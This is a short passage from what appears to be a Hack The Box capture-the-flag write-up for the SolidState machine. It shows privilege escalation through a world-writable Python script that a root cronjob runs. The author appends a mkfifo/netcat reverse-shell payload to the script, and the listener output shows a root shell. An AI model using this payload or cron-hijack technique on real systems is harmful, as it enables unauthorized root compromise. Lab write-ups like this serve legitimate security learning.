File Write
It was discovered that a cronjob with UID of 0 is executing a Python script, which turned out to be write-able by anyone
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo "os.system('mkfifo /tmp/ysphyy; nc 10.10.14.5 1234 0</tmp/ysphyy | /bin/sh >/tmp/ysphyy 2>&1; rm /tmp/ysphyy')" >> /opt/tmp.pyThe Python script already has access to the os and sys libraries, which can be used to execute additional commands within the script.
By using the os.system() function, it’s possible to embed the payload within the script.
This can be done by wrapping the payload in the os.system() function and appending it to the bottom of the script. This way the payload will be executed as part of the script.
┌──(kali㉿kali)-[~/archive/htb/labs/solidstate]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 43006
whoami
root
hostname
solidstate
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:3e:11 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:3e11/64 scope global mngtmpaddr dynamic
valid_lft 86394sec preferred_lft 14394sec
inet6 fe80::250:56ff:feb9:3e11/64 scope link
valid_lft forever preferred_lft foreverA moment later, I get a root shell
System Level Compromise